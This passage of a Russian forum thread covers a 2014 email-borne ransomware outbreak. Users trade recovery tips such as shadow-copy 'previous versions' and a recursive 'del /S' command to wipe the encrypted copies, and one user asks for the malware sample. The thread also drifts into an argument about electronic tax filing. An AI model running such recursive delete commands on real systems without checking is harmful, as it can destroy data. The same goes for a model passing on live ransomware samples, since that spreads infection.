Ctrekoza
14.08.14
✎
02:40
|
(174) Значит поедет бух в квартал один раз и сдаст по ТКС через посредника...:)
Ну не пишут они про ваш случай...:) |
|||
176
Партизан
14.08.14
✎
02:54
|
(175) а для декларирования по алкоголю, например, представительства, как для ФНС, ПФР, не предусмотрено ))
|
|||
177
Ctrekoza
14.08.14
✎
02:58
|
(176) Значит покупаете нотик буху и вывозите его на полянку, где берет мобильный модем и ббух усиленно сдает всё и сам сдается..:)
|
|||
178
Ислам
14.08.14
✎
06:01
|
(19) Зачем разработчика шифратора забанили? Я хотел с ним посоветоваться.
|
|||
179
Эмбеддер
14.08.14
✎
06:15
|
у нас гл.бух запустила такую штуку в письме "резюме". она зашифровала все документы MS Office и *.jpg на всех своих и общих сетевых дисках. платить все равно не будем))) за такое надо уголовную ответственность, как за кражу автомобильных номеров)))
|
|||
180
Ислам
14.08.14
✎
06:26
|
(179) никак за такое не накажешь. По сути, те люди, которым переводятся деньги, помогают вам расшифровать файлы, а это не преступление.
Наказать можно тех людей, которые их зашифровали (это ваша гл. бух) |
|||
181
Мутабор
14.08.14
✎
06:53
|
Скачал тело
оно даже zip rar 1cd фотки, офисный, корел, кад шифрует. Прикольно |
|||
182
Эмбеддер
14.08.14
✎
07:02
|
(180) ну-ну)))
|
|||
183
Эмбеддер
14.08.14
✎
07:03
|
(180) вопрос, который автору вируса ты собирался задать, видимо, о сотрудничестве в области расшифровки был
|
|||
184
Мутабор
14.08.14
✎
07:12
|
Ну это не вирус, вирус себя вопроизводит, это другой тип вредоносных программ....
|
|||
185
Эмбеддер
14.08.14
✎
07:16
|
(184) ну да, правильно сказать - троянец
|
|||
186
zak555
14.08.14
✎
08:29
|
(169) > Ну это не совсем так, если выставляете и платите НДС.
максимальная ответственность за сдачу декларации НДС в бумажном виде -- 200 р т.е. 800 р/год сколько стоит ЭП и лицензия на сдачу через оператора ткс в год ? |
|||
187
zak555
14.08.14
✎
08:29
|
(167) (169) и хватит приводить ссылки на г@вняный форум
|
|||
188
zak555
14.08.14
✎
08:31
|
(184) он и рассылает по адресной книге себя твоим контактам
|
|||
189
Patrio_
O_Muerte 14.08.14
✎
08:57
|
Нас как то зашифровали, мы оплатили 1500 р и то что мы получили нам ни хрена не помогло, хотя в каком то смысле помощь оказало, но всю расшифровку на себя взяли специалисты Др.Веба, за 2 недели нам прислали готовый скрипт для расшифровки.
|
|||
190
Jump
14.08.14
✎
09:04
|
(100)Как все просто.
Выход конечно хороший, только вот далеко не всегда это возможно. |
|||
191
Jump
14.08.14
✎
09:06
|
(188)У меня есть программка которая рассылает сообщение по всем или по выборочным контактам - аутлук называется.
И что теперь это вирус? |
|||
192
zak555
14.08.14
✎
09:31
|
(191) ага
|
|||
193
Smile 8D
14.08.14
✎
09:53
|
(191) Ключевое слово было "себя", т.е. вирус таким образом размножается. Аутулук, насколько я знаю, себя не рассылает (тем более в автоматическом режиме)
|
|||
194
mishaPH
модератор
14.08.14
✎
09:55
|
(189) + 100 нам также помогли.
|
|||
195
zak555
14.08.14
✎
11:34
|
кажись есть решение, сейчас проверю
|
|||
196
zak555
14.08.14
✎
11:48
|
+ есть идея, как вернуть деньги, если заплатишь
|
|||
197
Эмбеддер
14.08.14
✎
11:49
|
(191) требуется также здравый смысл при классификации чего-либо
|
|||
198
ildary
14.08.14
✎
11:54
|
(81) уважаемые специалисты, как правильно сделать запрет просмотра файлов в папке с базой DBF?
|
|||
199
zak555
14.08.14
✎
12:24
|
РЕЗЮМЕ :
чудным образом выяснилось, что у диска С оказались предыдущие версии, а вот у Д -- нет |
|||
200
zak555
14.08.14
✎
12:25
|
а теперь вопрос
как автоматизировать процесс удаления зашифрованного файла вида ИмяФайла.Расширение.keybtc@gmail_com и перенос из папки восстановления нормального файла ИмяФайла.Расширение ? |
|||
201
NikVars
14.08.14
✎
12:53
|
(199) Ты про архивные образы диска С речь ведешь?!
|
|||
202
zak555
14.08.14
✎
13:02
|
(201) ага
точки восстановления |
|||
203
NikVars
14.08.14
✎
13:14
|
(202) Ты погодь радоваться. А они пользовательские данные содержат?!
|
|||
204
zak555
14.08.14
✎
13:31
|
(203)
да, наживаю диск С правой кнопкой, далее предыддущие версии, нажимаю на кнопку открыть и воля -- все данные на метсе |
|||
205
zak555
14.08.14
✎
13:31
|
*мест
|
|||
206
zak555
14.08.14
✎
13:31
|
**на месте
|
|||
207
Arhangeldk
14.08.14
✎
14:45
|
http://habrahabr.ru/post/232545/
Попробуй мб поможет |
|||
208
zak555
14.08.14
✎
16:28
|
кто бы по 200 подсказал
|
|||
209
HeroShima
14.08.14
✎
16:31
|
Абрахамс...
|
|||
210
Ctrekoza
14.08.14
✎
19:20
|
(187) Тебя там забанили? Ты там также писал и они тебя забанили, а теперь ты всё время пишешь что форум плохой...
Ищи сам про КЭП. |
|||
211
zak555
14.08.14
✎
19:28
|
(210) нет, я там не бываю, но частенько ернуду там пишут
|
|||
212
Ctrekoza
14.08.14
✎
19:38
|
(211) Ты не прав. Статьи на этом сайте хорошего качества.
Ещё сайт аудит уважаю. |
|||
213
zak555
14.08.14
✎
19:41
|
(212) я неоднократно встречал там ошибки
клерк в этом плане лучший, ибо там каждую тему модерируют и говорят, где неправильно |
|||
214
Ctrekoza
14.08.14
✎
19:50
|
(213) Какие темы, очнись. Я пишу про статьи. А что на форуме может ответить малознающий бух и его не успели поправить, так такие косяки могут быть у всех.
Читай что считаешь нужным, но, обязательно найдется человек, который тебе также заявит, что там пишут...:) Ты вопрос свой решил? |
|||
215
zak555
14.08.14
✎
19:54
|
(214)
1. хорошо, сравни с аналогичной статьёй на клерке : http://www.klerk.ru/buh/articles/345087/ 2. по теме ветки ? |
|||
216
Ctrekoza
14.08.14
✎
20:01
|
(215) 2. Да.
|
|||
217
zak555
14.08.14
✎
20:02
|
(216) с диска С восстановил данные, с диска Д -- нет
+ я так же проработал вариант, как вернуть деньги, которую платятся мошенникам |
|||
218
Ctrekoza
14.08.14
✎
20:17
|
(215) Однако рассчитывать, что на деле все обойдется 200-рублевым штрафом, вряд ли стоит.>>>
Она не лучше статьи с бухонлайна. Ты не прошел по ссылке на бухонлайн и теперь так пишешь.. На бухонлайне написано ещё больше и понятнее, нужно пройтись по ссылкам в статье. А теперь вопрос? Первый квартал штрафанули на 200 р. второй на 200 р. или там уже типа злостного нарушения можно притянуть в течение периода (год)? И зачем себе создавать проблемы...( |
|||
219
Ctrekoza
14.08.14
✎
20:17
|
(217) Молодец. А диск Д тоже пострадал?
|
|||
220
zak555
14.08.14
✎
20:22
|
(218)
1. где на бух онЛайн написано про штраф в 200 р за квартал ? 2. 800 р/год -- ни о чём 3. + не вижу никаких проблем |
|||
221
zak555
14.08.14
✎
20:23
|
(219) разумеется, скрипт идёт по всем диска, в т.ч. и сетевым
|
|||
222
Ctrekoza
14.08.14
✎
20:40
|
(221) что решил делать?
|
|||
223
Ctrekoza
14.08.14
✎
20:43
|
(220)
1. пройди по ссылкам внутри статьи, там должно быть 2. И так из года в год? В НК есть - сдавать по ТКС, завтра могут поднять штрафы... 3. а на за чем платить штраф, если можно сдать и спать спокойно..:) |
|||
225
zak555
14.08.14
✎
21:16
|
(223)
1. не вижу 2. за день не поднимают 3. сколько годовое обслуживание по сдаче ткс ? |
|||
227
zak555
14.08.14
✎
21:37
|
(266) 3. сколько стоит ООО на ОСНО ?
|
|||
228
Ctrekoza
14.08.14
✎
21:42
|
(227) Да, там разница будет небольшая, может также, надо на их сайте смотреть прайс. А ещё, если стоит БП Проф и есть ИТС, тогда можно из программы сдавать, только кэп получить нужно, кэп стоит примерно 500-1500 р., зависит от носителя.
|
|||
230
zak555
14.08.14
✎
22:21
|
(228) только ИТС стоит 26 000
+ ещё ЭП |
|||
231
zak555
14.08.14
✎
22:21
|
(229) шифровка отрабатывается единожды
|
|||
232
Ctrekoza
14.08.14
✎
22:24
|
(230) Можно взять техно. По-моему, без разницы какой ИТС. Не вникала, надо посмотреть.
|
|||
233
zak555
14.08.14
✎
22:25
|
(232) как раз разница есть -- минимум ПРОФ
поэтому 0.8 р против 26 р -- ни о чём |
|||
234
Ctrekoza
14.08.14
✎
22:25
|
(231) жуть что делать?, ты меня вчера напугал, что от контрагента пришло, можно и правда нечаянно открыть....
|
|||
235
Ctrekoza
14.08.14
✎
22:26
|
(233) А как обновляешь, нетиповая?
|
|||
236
zak555
14.08.14
✎
22:28
|
(234) воспользоваться советом из 22 и 84
(235) у клиентов |
|||
237
zak555
19.08.14
✎
15:38
|
по 200 кто подскажет ?
|
|||
238
_fvadim
19.08.14
✎
15:42
|
(237) папка восстановления содержит необходимую структуру папок?
|
|||
239
zak555
19.08.14
✎
15:42
|
(238) ага
|
|||
240
_fvadim
19.08.14
✎
15:44
|
удалить можно попробовать так
del /S *.keybtc@gmail_com |
|||
241
_fvadim
19.08.14
✎
15:46
|
и просто скопировать сверху то что есть.
|
|||
242
zak555
19.08.14
✎
15:46
|
(240) а переименовать ?
|
|||
243
_fvadim
19.08.14
✎
15:47
|
(242) кого?
в (200) вроде нет ничего про переименование |
|||
244
zak555
19.08.14
✎
15:56
|
(243) если в папке с восстановлением есть некий файл, а в текущем состояние его нет (или файл переименован -- добавлен суффикс .keybtc@gmail_com), то при восстановлении точки этот файл не восстановится
|
|||
245
_fvadim
19.08.14
✎
16:08
|
(244) ааааа.
тады попробовать ren *.keybtc@gmail_com *. |
|||
246
zak555
19.08.14
✎
16:09
|
(245) только методика из 244 на виртуальной машине не отработала
=> пока остаётся убийство *.keybtc@gmail_com и копирование из копии в изначальное место |
|||
247
_fvadim
19.08.14
✎
16:11
|
если сработает, то есть нюанс - ren не умеет рекурсию, т.е.
запускать надо в каждом каталоге или гуглить "cmd рекурсивное переименование" |
|||
248
_fvadim
19.08.14
✎
16:12
|
(246) если откинуть .keybtc@gmail_com, восстанавливает?
|
|||
249
zak555
19.08.14
✎
16:14
|
(248) неа, не восстановил
|
|||
250
zak555
19.08.14
✎
16:14
|
хотя должен был
|
|||
251
_fvadim
19.08.14
✎
16:17
|
чёт вводные часто меняются.
предлагаю развернуть архив и руками (пользователя) скопировать нужное. |
|||
252
zak555
19.08.14
✎
16:17
|
(241) ты представляешь, если это несколько сот тысяч документов *?
|
|||
253
zak555
19.08.14
✎
16:17
|
||||
254
_fvadim
19.08.14
✎
16:21
|
(252) развернуть архив и показать пользователю где теперь его документы.
ну или определиться при каких условиях происходит автоматическое восстановление. |
|||
255
zak555
20.08.14
✎
09:26
|
(254) мне кажется, что нужно написать некий скрипт, который будет
0. указать в некую переменную путь к копиям : У = "\\localhost\C$\@GMT-2014.08.19-04.52.01" 1. искать по диску файлы с расширением *.keybtc@gmail_com 2. определять их путь Х 3. далее скопировать из у+х в х найденный соответствующий файл и удалить с расширением |
|||
256
_fvadim
20.08.14
✎
09:48
|
я писать не буду :)
обработку напиши, найтифайлы умеет искать в подкаталогах. |
|||
257
zak555
20.08.14
✎
09:50
|
(256) на 1с ?
её ещё и ставить надо |
|||
258
_fvadim
20.08.14
✎
09:52
|
(257) контекст форума как бы подразумевает :)
тады батниками |
|||
259
mortal
20.08.14
✎
09:58
|
Вчера манагер получил письмо от известного (с кем работал раньше) контрагента. Почта, правда, была другая, но он внимания не обратил, что нормально. И в письме, как вы уже догадались, был шифровщик, зашифровавший ему весь комп.
Благо, на сервера не полез... |
|||
260
zak555
20.08.14
✎
10:39
|
(259)
1. нет предыдущих версий ? 2. диски сервера не подключены, как сетевые ? |
|||
261
PuhUfa
20.08.14
✎
11:02
|
как сделал я
1. посмотрел где лежат похеренные файлы 2. отрезал им чужое расширение 3. пкм _на_папке_ -> предыдущая версия Откат к предыдущим версиям целыми папками заметно сокращет трудозатраты. |
|||
262
mortal
20.08.14
✎
11:27
|
(+259)админ позвонил этому контру: подтвердили взлом своей почты и то, что такие "письма счастья" получили почти все их контрагенты :)
(260) 1 - нет 2 - нет |
|||
263
zak555
22.08.14
✎
08:36
|
(261) откат не поможет
|
|||
264
zak555
22.08.14
✎
08:36
|
(261)
1. не повезло 2. не повезло |
|||
265
DrZombi
гуру
22.08.14
✎
08:41
|
(262) Ладно, что только письма счастье.
А вот когда тебя заносят в список спамеров и ты компания не может более отправлять почту, вот это проблема посерьезней :) |
|||
266
DrZombi
гуру
22.08.14
✎
08:43
|
(259) Что у вас там так все плохо?
А где настройка фильтра по содержимому, что бы кромя док и екселя, может еще и архив, ничего не принимал :) |
|||
267
Torquader
23.08.14
✎
21:20
|
(265) Для этого нужно иметь несколько ящиков с разными именами, чтобы даже полный отказ одного из них не приводит к последствиям.
(266) Я тут одним "товарищам" фильтр по содержимому настроил, так они это - попросили систему переставить, так как под предложенной им ничего не работает - и не докажешь, что сделано в целях их безопасности. |
|||
268
Ислам
27.08.14
✎
06:10
|
(187) Это не г@вняный форум. Настоящий г@вняный форум вот: http://govnoforum.ru Хахаха!!!
|
|||
271
Besogonskiy
03.09.14
✎
15:52
|
(0)подари мне этот файл.
|
|||
272
zak555
03.09.14
✎
15:53
|
(271) см. в 54
|
|||
273
_fvadim
03.09.14
✎
15:56
|
(271) лентяй :)
там файлик тянет несколько экзешников из интернету. так что толку от скрипта загрузки - 0. |
Форум | Правила | Описание | Объявления | Секции | Поиск | Книга знаний | Вики-миста |